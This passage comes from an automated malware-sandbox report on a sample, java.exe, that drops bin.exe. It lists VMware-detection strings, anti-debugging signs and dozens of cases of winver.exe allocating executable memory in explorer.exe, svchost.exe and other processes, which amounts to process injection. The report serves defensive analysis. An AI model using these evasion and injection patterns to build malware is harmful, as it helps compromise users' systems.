            Source: explorer.exe, 00000003.00000002.3032615601.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vmare7220
            Source: RuntimeBroker.exe, 0000000A.00000000.1738554680.000001ECFA2A4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\Desktop\java.exeAPI call chain: ExitProcess graph end nodegraph_0-3089
            Source: C:\Windows\SysWOW64\winver.exeAPI call chain: ExitProcess graph end nodegraph_2-2570
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeAPI call chain: ExitProcess graph end nodegraph_12-5585
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeAPI call chain: ExitProcess graph end nodegraph_12-5409
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeAPI call chain: ExitProcess graph end nodegraph_12-5895
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\winver.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02260005 rdtsc 0_2_02260005
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_00401000 mov eax, dword ptr fs:[00000030h]0_2_00401000
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02260C63 mov eax, dword ptr fs:[00000030h]0_2_02260C63
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_02F00C3F mov eax, dword ptr fs:[00000030h]2_2_02F00C3F
            Source: C:\Windows\explorer.exeCode function: 3_2_01380C3F mov eax, dword ptr fs:[00000030h]3_2_01380C3F
            Source: C:\Windows\explorer.exeCode function: 3_2_013A0C3F mov eax, dword ptr fs:[00000030h]3_2_013A0C3F
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC0C3F mov eax, dword ptr fs:[00000030h]4_2_00AC0C3F
            Source: C:\Windows\System32\svchost.exeCode function: 5_2_00910C3F mov eax, dword ptr fs:[00000030h]5_2_00910C3F
            Source: C:\Windows\System32\svchost.exeCode function: 6_2_009A0C3F mov eax, dword ptr fs:[00000030h]6_2_009A0C3F
            Source: C:\Windows\System32\ctfmon.exeCode function: 7_2_00A50C3F mov eax, dword ptr fs:[00000030h]7_2_00A50C3F
            Source: C:\Windows\System32\svchost.exeCode function: 8_2_00D40C3F mov eax, dword ptr fs:[00000030h]8_2_00D40C3F
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 9_2_00B50C3F mov eax, dword ptr fs:[00000030h]9_2_00B50C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 10_2_00110C3F mov eax, dword ptr fs:[00000030h]10_2_00110C3F
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 12_2_001C0C3F mov eax, dword ptr fs:[00000030h]12_2_001C0C3F
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 12_2_02380C63 mov eax, dword ptr fs:[00000030h]12_2_02380C63
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 15_2_00AB0C3F mov eax, dword ptr fs:[00000030h]15_2_00AB0C3F
            Source: C:\Windows\System32\smartscreen.exeCode function: 16_2_00290C3F mov eax, dword ptr fs:[00000030h]16_2_00290C3F
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 17_2_001C0C3F mov eax, dword ptr fs:[00000030h]17_2_001C0C3F
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 17_2_023A0C63 mov eax, dword ptr fs:[00000030h]17_2_023A0C63
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: 19_2_00580C3F mov eax, dword ptr fs:[00000030h]19_2_00580C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 20_2_003D0C3F mov eax, dword ptr fs:[00000030h]20_2_003D0C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 23_2_00900C3F mov eax, dword ptr fs:[00000030h]23_2_00900C3F
            Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 24_2_00180C3F mov eax, dword ptr fs:[00000030h]24_2_00180C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 26_2_00190C3F mov eax, dword ptr fs:[00000030h]26_2_00190C3F
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeCode function: 28_2_00010C3F mov eax, dword ptr fs:[00000030h]28_2_00010C3F
            Source: C:\Windows\System32\svchost.exeCode function: 29_2_00220C3F mov eax, dword ptr fs:[00000030h]29_2_00220C3F
            Source: C:\Windows\System32\dllhost.exeCode function: 30_2_006E0C3F mov eax, dword ptr fs:[00000030h]30_2_006E0C3F
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_00E60C3F mov eax, dword ptr fs:[00000030h]31_2_00E60C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 32_2_00940C3F mov eax, dword ptr fs:[00000030h]32_2_00940C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 34_2_00B00C3F mov eax, dword ptr fs:[00000030h]34_2_00B00C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 35_2_02860C3F mov eax, dword ptr fs:[00000030h]35_2_02860C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 36_2_02BB0C3F mov eax, dword ptr fs:[00000030h]36_2_02BB0C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 37_2_02560C3F mov eax, dword ptr fs:[00000030h]37_2_02560C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 38_2_02610C3F mov eax, dword ptr fs:[00000030h]38_2_02610C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 39_2_02520C3F mov eax, dword ptr fs:[00000030h]39_2_02520C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 40_2_02B20C3F mov eax, dword ptr fs:[00000030h]40_2_02B20C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 41_2_01450C3F mov eax, dword ptr fs:[00000030h]41_2_01450C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 42_2_02620C3F mov eax, dword ptr fs:[00000030h]42_2_02620C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 43_2_00EE0C3F mov eax, dword ptr fs:[00000030h]43_2_00EE0C3F
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exeCode function: 44_2_02D30C3F mov eax, dword ptr fs:[00000030h]44_2_02D30C3F

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\explorer.exe base: 13A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\sihost.exe base: AC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\svchost.exe base: 910000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: A50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\explorer.exe base: 1380000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\svchost.exe base: D40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 110000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: AB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 290000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 900000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 190000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\svchost.exe base: 220000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 6E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\conhost.exe base: E60000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 940000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B00000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2860000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2BB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2560000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2610000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2520000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2B20000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1450000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2620000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: EE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2D30000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: E40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 920000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: E40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 23C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 10B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2790000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: A50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2510000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: CE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 640000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 8E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1040000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: F90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: A90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2350000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 29B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1190000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 27F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2EF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 28D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: B90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2B70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2BD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1170000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 940000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 6E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 14D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2A30000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 5E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2960000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 3010000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2560000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 13C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 13B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 25F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2EF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 5D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 550000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: A10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: BD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 550000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2C30000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 25F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 910000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 940000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2C90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2DA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 8D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2DC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2AE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2130000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 720000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 23D0000 protect: page execute and read and writeJump to behavior
